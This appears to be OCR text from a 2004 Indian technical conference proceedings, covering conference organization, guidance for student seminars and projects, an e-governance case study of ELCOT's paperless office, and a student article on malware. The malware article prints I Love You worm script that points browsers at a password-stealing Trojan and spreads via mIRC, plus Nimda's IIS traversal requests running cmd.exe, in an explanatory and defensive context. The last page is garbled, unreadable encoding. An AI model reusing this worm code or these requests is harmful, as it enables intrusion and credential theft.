Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

